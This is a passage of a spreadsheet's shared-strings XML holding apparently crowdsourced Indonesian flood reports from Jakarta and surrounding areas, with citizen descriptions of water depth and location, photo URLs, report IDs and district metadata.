    <t>https://images.petabencana.id/46c64347-e9e9-4a58-986c-e6f8bf11012c.jpg</t>
  </si>
  <si>
    <t>mulai masukkkk</t>
  </si>
  <si>
    <t>6722385a-7c2c-4a05-b9dc-7aff1cbb719b</t>
  </si>
  <si>
    <t>Hujan lebat air sudah mendekati 45cm</t>
  </si>
  <si>
    <t>2f267d1f-f56e-4e52-b5b0-59534a169d3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f267d1f-f56e-4e52-b5b0-59534a169d3d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "607", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Uda parah</t>
  </si>
  <si>
    <t>72a91e1c-7233-4ec8-855a-8121de07bb67</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72a91e1c-7233-4ec8-855a-8121de07bb67.jpg</t>
  </si>
  <si>
    <t>Lokasi: Komplek Taman Harapan Indah, Jakarta Barat</t>
  </si>
  <si>
    <t>fb29ea14-b1d1-4005-8787-14634f6fff82</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb29ea14-b1d1-4005-8787-14634f6fff82.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "538", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah kampung rawa sawah sekitaran masjid babussalam</t>
  </si>
  <si>
    <t>0ad06a2f-1965-4e1f-b97b-04444302999a</t>
  </si>
  <si>
    <t>Banjir 40-60cm di Komplek Keuangan, Jati, Pulogadung, Jakarta Timur</t>
  </si>
  <si>
    <t>39a51c77-1993-4e8d-bd44-49cb0a375407</t>
  </si>
  <si>
    <t>https://images.petabencana.id/39a51c77-1993-4e8d-bd44-49cb0a375407.jpg</t>
  </si>
  <si>
    <t>ab1e02ea-e7be-4705-9529-b33a866a2e16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ab1e02ea-e7be-4705-9529-b33a866a2e16.jpg</t>
  </si>
  <si>
    <t>705990b0-48a2-4901-8594-c5c9326da67b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/705990b0-48a2-4901-8594-c5c9326da67b.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi ban avanza di depan apartemen mediterania palace kemayoran</t>
  </si>
  <si>
    <t>c5604e3f-e966-4296-aafe-16dc3b452b21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5604e3f-e966-4296-aafe-16dc3b452b21.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi paha mau keluar akses tidak bisa</t>
  </si>
  <si>
    <t>14bd99c6-6471-4e55-8477-65e139c46c22</t>
  </si>
  <si>
    <t>https://images.petabencana.id/14bd99c6-6471-4e55-8477-65e139c46c22.jpg</t>
  </si>
  <si>
    <t>Banjir di kelurahan rawaterate untuk ke-4 kalinya saat ini air sudah sepaha kemungkinan akan naik jika hujan tidak berhenti</t>
  </si>
  <si>
    <t>98c555a9-16e6-4aaf-b9fa-a9e8bc37ba13</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98c555a9-16e6-4aaf-b9fa-a9e8bc37ba13.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 21, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2576", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sekitar halte transjakarta taman kota</t>
  </si>
  <si>
    <t>a59bc065-9f46-4b0d-a2d4-697b364bf051</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a59bc065-9f46-4b0d-a2d4-697b364bf051.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1340", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dr awal tahun hingga skrg</t>
  </si>
  <si>
    <t>463384ce-563c-4816-be11-ed45b0f83be7</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 63, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Hujan sejak jam 12 malam Intensitas naik turun Banjir sudah lebih dari 50cm sehingga jalan tidak bisa dilalui kendaraan"</t>
  </si>
  <si>
    <t>1e1c2924-b3da-48d6-9ca4-62002d99dec7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e1c2924-b3da-48d6-9ca4-62002d99dec7.jpg</t>
  </si>
  <si>
    <t>d8559bbf-4f72-4262-a778-c0c159722ce8</t>
  </si>
  <si>
    <t>Banjir di Kompleks Harapan Baru, Bekasi</t>
  </si>
  <si>
    <t>38bbbcf3-e5b1-4ff9-a11f-146e20dd9d74</t>
  </si>
  <si>
    <t>https://images.petabencana.id/38bbbcf3-e5b1-4ff9-a11f-146e20dd9d74.jpg</t>
  </si>
  <si>
    <t>Photo dI depan komp antilop Jaticempaka pd gede bekasi di bagian dalam lebih dalam lagi banjirnya</t>
  </si>
  <si>
    <t>f185335c-0eb6-4762-9ffe-1716941f8a0e</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 54, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Listrik padam. Lalu lintas bisa dilewati dengan gas stabil</t>
  </si>
  <si>
    <t>c8b59725-92f0-4b3a-b427-2cc7a7344301</t>
  </si>
  <si>
    <t>Perumahan Janur Elok</t>
  </si>
  <si>
    <t>c8f08274-6333-406b-aeb5-041e0874f9f6</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1449", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gang sawo komplek permata</t>
  </si>
  <si>
    <t>d8ae0789-241b-4659-a5e2-f8d7abdfb25d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d8ae0789-241b-4659-a5e2-f8d7abdfb25d.jpg</t>
  </si>
  <si>
    <t>20 cm di dalam rumah.</t>
  </si>
  <si>
    <t>773d8305-01ba-4e1b-972b-86913e680822</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir bentar lg kyk januari 2020</t>
  </si>
  <si>
    <t>f1e970a7-91f5-4842-b872-5a4c3061b134</t>
  </si>
  <si>
    <t>Banjir setinggi perut orang dewasa. Sampai saat ini masih hujan deras berpotensi kenaikan tinggi air banjir.</t>
  </si>
  <si>
    <t>abda641e-d62b-4b57-a24a-6427db100d10</t>
  </si>
  <si>
    <t>https://images.petabencana.id/abda641e-d62b-4b57-a24a-6427db100d10.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1523", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir wilayah cilangkap, cilangkap residence rawa lindung dan sekitarnya</t>
  </si>
  <si>
    <t>0a43bfe2-0182-42aa-9b15-595b69cea591</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a43bfe2-0182-42aa-9b15-595b69cea591.jpg</t>
  </si>
  <si>
    <t>Banjir di lingkungan RT 001 RW 01 Kel Kebon Pala Kec Makasar</t>
  </si>
  <si>
    <t>8b0682cf-df31-4efd-a544-e78f2bcfa109</t>
  </si>
  <si>
    <t>233595ae-52f8-49d3-b724-9459f65e7b42</t>
  </si>
  <si>
    <t>https://images.petabencana.id/233595ae-52f8-49d3-b724-9459f65e7b42.jpg</t>
  </si>
  <si>
    <t>Banjir sedengkul, beberapa rumah sudah masuk.</t>
  </si>
  <si>
    <t>Jaka Mulya</t>
  </si>
  <si>
    <t>0d347c83-13f6-47ca-99be-01ac2ffc130b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0d347c83-13f6-47ca-99be-01ac2ffc130b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "571", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ff7b9e0d-7ede-4449-8d50-3bdd4c2dd314</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 80, "report_type": "flood" }</t>
  </si>
  <si>
    <t>banjir di Masnaga Bintara Jaya, Bekasi Barat. kurang lebih 90 cm</t>
  </si>
  <si>
    <t>4ee67116-e647-4da9-ab8e-bfe5f073a3b5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4ee67116-e647-4da9-ab8e-bfe5f073a3b5.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 112, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Gg. H. Kaimah Rt 001 Rw 01 Kel. Rambutan Kec. Ciracas Jakarta Timur</t>
  </si>
  <si>
    <t>f1633868-d5c9-4720-88f9-7c9aa50152e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f1633868-d5c9-4720-88f9-7c9aa50152e9.jpg</t>
  </si>
  <si>
    <t>Banjir di kebon sirih</t>
  </si>
  <si>
    <t>14a97790-304a-4d22-98f4-9bced3913fc2</t>
  </si>
  <si>
    <t>komplek Antilop, air lebih satu ban mobil. jaticempaka. pondok gede</t>
  </si>
  <si>
    <t>3d397b05-a467-456b-9c52-b195e443a1a2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3d397b05-a467-456b-9c52-b195e443a1a2.jpg</t>
  </si>
  <si>
    <t>banjir hampir selutut di depan rumah</t>
  </si>
  <si>
    <t>1c717a83-5c60-4793-adc7-b47e94896203</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c717a83-5c60-4793-adc7-b47e94896203.jpg</t>
  </si>
  <si>
    <t>c2ac2d15-deda-4ba4-ae8e-afe231cb6ec7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c2ac2d15-deda-4ba4-ae8e-afe231cb6ec7.jpg</t>
  </si>
  <si>
    <t>Rusun Bumi Cengkareng Indah.. aster 1 sekitar 30 cm.. makin kedepan pos makin dalam banjirnya..</t>
  </si>
  <si>
    <t>8b96d602-e8dc-499e-964a-df098321d104</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b96d602-e8dc-499e-964a-df098321d104.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "475", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah masuk rumah, sampai betis di jalanan</t>
  </si>
  <si>
    <t>db2780a6-4307-4d35-81e6-cc08318b439c</t>
  </si>
  <si>
    <t>Perumnas 1 Bekasi Ketinggian 60 - 100 cm"</t>
  </si>
  <si>
    <t>e2de6562-e5f2-4aa3-9eec-815c3fed7afe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e2de6562-e5f2-4aa3-9eec-815c3fed7afe.jpg</t>
  </si>
  <si>
    <t>Lokasi perumnas 3 bekasi timur</t>
  </si>
  <si>
    <t>53d07360-9a50-4fab-981e-7d1cd8953d06</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 107, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Air sudah masuk kerumah.sungai dekat pemukiman warga meluap</t>
  </si>
  <si>
    <t>589d943f-cb21-4bfd-ba7c-afbf55237fab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/589d943f-cb21-4bfd-ba7c-afbf55237fab.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "585", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir bikin kebangun padahal masih ngantuk</t>
  </si>
  <si>
    <t>fbe4550e-d7ed-405c-b4a3-961438534f58</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fbe4550e-d7ed-405c-b4a3-961438534f58.jpg</t>
  </si>
  <si>
    <t>Banjaran Wetan</t>
  </si>
  <si>
    <t>Banjaran</t>
  </si>
  <si>
    <t>dd77b2f9-4c3c-4fe8-aed7-65f7390b8e55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dd77b2f9-4c3c-4fe8-aed7-65f7390b8e55.jpg</t>
  </si>
  <si>
    <t>Marga Jaya</t>
  </si>
  <si>
    <t>6a6051ff-ace6-4930-9dbb-56dbb905d247</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6a6051ff-ace6-4930-9dbb-56dbb905d247.jpg</t>
  </si>
  <si>
    <t>Banjir , pinang griya permai , tangerang , Banten</t>
  </si>
  <si>
    <t>4ea7ad47-b2dd-4712-a8af-8d4fcf29afee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4ea7ad47-b2dd-4712-a8af-8d4fcf29afee.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 87, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1167", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah naik setinggi pinggang orang dewasa pada jam 5.49 wib</t>
  </si>
  <si>
    <t>02e3f9c4-7664-43bc-8a21-d9799614d5e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/02e3f9c4-7664-43bc-8a21-d9799614d5e2.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 39, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjjr sebetis orang dewasa</t>
  </si>
  <si>
    <t>0ca05585-f640-451e-bb67-1ac6f75f0fa8</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 84, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2133", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mhn bantuan percepatan nya jln balap sepeda 3 Rawamangun Pulo gadung Jakarta Timur banjir! Sejak ada LRT jadi banjir, seblmnya  tdk pernah!</t>
  </si>
  <si>
    <t>e09a357e-fdf8-442e-8e04-a3bd0a2dc161</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e09a357e-fdf8-442e-8e04-a3bd0a2dc161.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 55, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "487", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di komplek tni al pramuka rawasari</t>
  </si>
  <si>
    <t>06291649-a02c-4b39-a41c-d7de80a20689</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06291649-a02c-4b39-a41c-d7de80a20689.jpg</t>
  </si>
  <si>
    <t>Banjir se-atas mata kaki + mati lampu. Air kali masih di bawah beton. Namun volune cukup tinggi.</t>
  </si>
  <si>
    <t>0abae77c-ae20-40e2-9630-7c41ef5994ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0abae77c-ae20-40e2-9630-7c41ef5994ab.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "363", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tangki</t>
  </si>
  <si>
    <t>99990969-94b1-49c1-a58c-65e5ccb13b2e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99990969-94b1-49c1-a58c-65e5ccb13b2e.jpg</t>
  </si>
  <si>
    <t>pertama kali dalam 20 tahun rawamangun banjir</t>
  </si>
  <si>
    <t>9ccb0da2-ac9b-496b-9b4d-ba0cd180ce73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ccb0da2-ac9b-496b-9b4d-ba0cd180ce73.jpg</t>
  </si>
  <si>
    <t>Diluar rumah sdh tinggi 20-30 cm, didalam rumah sdh masuk 2-3 cm</t>
  </si>
  <si>
    <t>6f31e22a-25c5-4c90-8756-947b7c9e70fe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f31e22a-25c5-4c90-8756-947b7c9e70fe.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1872", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Halim 60-75CM akses Airport terputus (Hanya bisa lewat jl jengki)</t>
  </si>
  <si>
    <t>3ee79717-ac5f-4017-a02e-9514bc18a7ab</t>
  </si>
  <si>
    <t>Banjir se lutut, Air mulai naik jam 3.30, kondisi saat ini Jam 5.50 masih hujan</t>
  </si>
  <si>
    <t>d8f52579-86e2-41ae-9c0d-43ee7120a681</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d8f52579-86e2-41ae-9c0d-43ee7120a681.jpg</t>
  </si>
  <si>
    <t>Banjir daerah Ciketing asam jaya Bekasi timur</t>
  </si>
  <si>
    <t>e7b5aadd-4b22-4f1c-afbf-f5976dea03d8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7b5aadd-4b22-4f1c-afbf-f5976dea03d8.jpg</t>
  </si>
  <si>
    <t>BANJIR (LAGI)</t>
  </si>
  <si>
    <t>Mustika Sari</t>
  </si>
  <si>
    <t>425c35f5-6ff0-4f87-8a49-4d06352a1f29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/425c35f5-6ff0-4f87-8a49-4d06352a1f29.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 17, "report_type": "flood" }</t>
  </si>
  <si>
    <t>a82cd7e0-2e17-4250-827b-0b3ac8d84429</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a82cd7e0-2e17-4250-827b-0b3ac8d84429.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 14, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "572", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan kran 2, tidak seperti biasanya, dikasih hujan semalemam, akhirnya air naik, walaupun hanya berkisar 10 cm-an.</t>
  </si>
  <si>
    <t>63a5a039-9a02-424f-ac41-bda3fcaa79cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63a5a039-9a02-424f-ac41-bda3fcaa79cc.jpg</t>
  </si>
  <si>
    <t>Banjir 60cm, listrik padam</t>
  </si>
  <si>
    <t>df040c94-4934-47d8-bf47-c706fe775c6f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df040c94-4934-47d8-bf47-c706fe775c6f.jpg</t>
  </si>
  <si>
    <t>Air sudah melewati 50 cm, hampir semua rumah kemasukan air banjir</t>
  </si>
  <si>
    <t>933d1291-d6d9-4786-833d-64ce7524e4cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/933d1291-d6d9-4786-833d-64ce7524e4cc.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 112, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1141", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir didepan pasar buncit jakarta selatan, kemang utara 9C</t>
  </si>
  <si>
    <t>6eac573b-3469-4714-b1f6-a37013c32774</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6eac573b-3469-4714-b1f6-a37013c32774.jpg</t>
  </si>
  <si>
    <t>komplek griya kemang.. samping pintu tol jatiwaringin</t>
  </si>
  <si>
    <t>d7a5d390-e743-42f2-81d8-b21c2c90fad3</t>
  </si>
  <si>
    <t>progress ketinggian banjir di Jl. Semangka 1 sudah selutut org dewasa..</t>
  </si>
  <si>
    <t>19523119-8f68-40e9-92b5-495529ff8e50</t>
  </si>
  <si>
    <t>https://images.petabencana.id/19523119-8f68-40e9-92b5-495529ff8e50.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan duren jaya Bekasi timur. Pukul 06.00 ketinggian kurang lebih 40 - 50 cm</t>
  </si>
  <si>
    <t>3fb477d0-fa14-4827-894a-5db4f81383b3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3fb477d0-fa14-4827-894a-5db4f81383b3.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 19, "report_type": "flood" }</t>
  </si>
  <si>
    <t>76e57e77-e599-437d-8a8e-764970b47fd4</t>
  </si>
  <si>
    <t>Jalan jakarta..  jalan penghubung cikunir dengan taman galaxy.. banjir diatas dengkul orang dewasa</t>
  </si>
  <si>
    <t>1112907f-fd18-4839-b263-9159a216c368</t>
  </si>
  <si>
    <t>Banjir. Ga biasa banjir jd banjir  percetakan negara 10.</t>
  </si>
  <si>
    <t>c0586cd1-201e-4c65-8da3-4d7bc7dbb318</t>
  </si>
  <si>
    <t>Hujan deras sekali mulai dari sekitar jam 1 pagi hingga jam 6 pagi. Air sudah mulai masuk ke rumah dengan tinggi sekitar 20cm(diluar rumah)</t>
  </si>
  <si>
    <t>ec0bddaf-1acb-4b17-87d1-e34a6cfa1c57</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ec0bddaf-1acb-4b17-87d1-e34a6cfa1c57.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1936", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>5.30</t>
  </si>
  <si>
    <t>b6da8e9b-18ec-479d-bdcd-f940ff54e0df</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6da8e9b-18ec-479d-bdcd-f940ff54e0df.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 48, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jln raya kalibata kali ciliwung banjir</t>
  </si>
  <si>
    <t>c62e839a-5688-42f9-9192-de1b8d144e40</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c62e839a-5688-42f9-9192-de1b8d144e40.jpg</t>
  </si>
  <si>
    <t>{ "points": 5, "flood_depth": 75, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2682", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sekitar Shangrilla dan BNI</t>
  </si>
  <si>
    <t>c19d087d-559e-4e52-a8de-a2e6734a59b8</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 65, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1650", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah sepaha</t>
  </si>
  <si>
    <t>216c491f-5117-46be-8c29-addf6b1e4ead</t>
  </si>
  <si>
    <t>https://images.petabencana.id/216c491f-5117-46be-8c29-addf6b1e4ead.jpg</t>
  </si>
  <si>
    <t>f0731b0b-ff02-4da6-b9da-752ef318d3e3</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "545", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir ketiga tahun ini setelah bertahun2 tidak banjir, apa iya jakarta salah manajemen??</t>
  </si>
  <si>
    <t>8245906c-6b5e-48b2-b3ea-d43c29ad6065</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8245906c-6b5e-48b2-b3ea-d43c29ad6065.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "716", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>c81911d7-63d4-4d30-af05-f5cd0379c0ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c81911d7-63d4-4d30-af05-f5cd0379c0ef.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "315", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir jl. Kepu dalam VI, sudah masuk dalam rumah 40-50cm</t>
  </si>
  <si>
    <t>1ef490c6-08b8-407d-80f3-0efb73f9a57c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ef490c6-08b8-407d-80f3-0efb73f9a57c.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 52, "report_type": "flood" }</t>
  </si>
  <si>
    <t>402fd407-14bb-43e1-9c69-2b94285e0cfa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/402fd407-14bb-43e1-9c69-2b94285e0cfa.jpg</t>
  </si>
  <si>
    <t>5d9daeea-9e3b-4411-94a0-e3f13db01f46</t>
  </si>
  <si>
    <t>Perumahan Pinang Griya Permai di jalan banjir setinggi 70cm</t>
  </si>
  <si>
    <t>f7fe3ac5-f870-4189-9db5-98b6235f9c71</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7fe3ac5-f870-4189-9db5-98b6235f9c71.jpg</t>
  </si>
  <si>
    <t>05cb3921-94f0-4aa5-8cee-fb3b4d2fb225</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05cb3921-94f0-4aa5-8cee-fb3b4d2fb225.jpg</t>
  </si>
  <si>
    <t>Setiap hujan pasti banjir. Mohon secepatnya segera di tangani</t>
  </si>
  <si>
    <t>833f6511-8cb2-4772-a8b8-d1f67dc5f9c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/833f6511-8cb2-4772-a8b8-d1f67dc5f9c7.jpg</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 49, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir se lutut orang dewasa</t>
  </si>
  <si>
    <t>77f476ba-344c-4099-b55e-1788c708b246</t>
  </si>
  <si>
    <t>https://images.petabencana.id/77f476ba-344c-4099-b55e-1788c708b246.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 47, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Di jalanan tinggi air sktr 50 cm</t>
  </si>
  <si>
    <t>db2f41b5-ae7a-40e4-8c59-820c4092502a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/db2f41b5-ae7a-40e4-8c59-820c4092502a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "359", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sekitar mangga besar</t>
  </si>
  <si>
    <t>ceebf9e4-0fbc-4dcc-831f-43dc4e9533a4</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2611", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kemaren aman2 aja sekarang BANJIR</t>
  </si>
  <si>
    <t>Kwitang</t>
  </si>
  <si>
    <t>6779311c-a303-4649-a8f6-27f037749b00</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6779311c-a303-4649-a8f6-27f037749b00.jpg</t>
  </si>
  <si>
    <t>Jalan Johar Baru Utara 6</t>
  </si>
  <si>
    <t>103ff4ef-ee37-4bae-a440-f52589dd0a1d</t>
  </si>
  <si>
    <t>Banjir 40-60cm di Komplek Kementerian Keuangan, Pulogadung, Jakarta Timur</t>
  </si>
  <si>
    <t>07100942-6003-4473-af0e-795102bffff6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/07100942-6003-4473-af0e-795102bffff6.jpg</t>
  </si>
  <si>
    <t>406bf20c-490e-4da8-8503-8af48c41bae5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/406bf20c-490e-4da8-8503-8af48c41bae5.jpg</t>
  </si>
  <si>
    <t>mantap banjir lagi</t>
  </si>
  <si>
    <t>d01522fd-729f-4a2c-ab82-f5e79680631e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d01522fd-729f-4a2c-ab82-f5e79680631e.jpg</t>
  </si>
  <si>
    <t>Tolongggg....</t>
  </si>
  <si>
    <t>1d8b945b-582f-4f9a-b885-b81c702a67cb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d8b945b-582f-4f9a-b885-b81c702a67cb.jpg</t>
  </si>
  <si>
    <t>Cempaka Putih Barat XXI, Setneg sudah sepinggang orang dewasa</t>
  </si>
  <si>
    <t>8713898b-c737-4e59-a477-7f01796c9067</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8713898b-c737-4e59-a477-7f01796c9067.jpg</t>
  </si>
  <si>
    <t>Pondok Surya Mandala, Jalan utama sudah sepinggang deket rt 03, rt 11</t>
  </si>
  <si>
    <t>35c9a8ad-c6f0-4a0d-be73-b88a542c1a8b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35c9a8ad-c6f0-4a0d-be73-b88a542c1a8b.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek perumahan irida barat</t>
  </si>
  <si>
    <t>903a8af9-8d55-400f-92f7-f12be6940ea1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/903a8af9-8d55-400f-92f7-f12be6940ea1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "717", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir selutut dewasa</t>
  </si>
  <si>
    <t>411a1b7b-144d-44f7-abfa-558ff79878c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/411a1b7b-144d-44f7-abfa-558ff79878c1.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 128, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sedada org dewasa</t>
  </si>
  <si>
    <t>b4ba9a88-12a0-47d0-8b87-6d6764823300</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4ba9a88-12a0-47d0-8b87-6d6764823300.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 30, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "525", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl.Pembangunan Dalam Belakang Mall Gajah Mada..</t>
  </si>
  <si>
    <t>Petojo Utara</t>
  </si>
  <si>
    <t>92225e2b-5d35-4e57-b9ff-4ba2d3b78474</t>
  </si>
  <si>
    <t>https://images.petabencana.id/92225e2b-5d35-4e57-b9ff-4ba2d3b78474.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "580", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir guys</t>
  </si>
  <si>
    <t>312d6f8d-e612-46fa-8109-d653933bcbbf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/312d6f8d-e612-46fa-8109-d653933bcbbf.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1719", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>5197c776-7ce2-4866-abe9-b7aaf57b6e78</t>
  </si>
  <si>
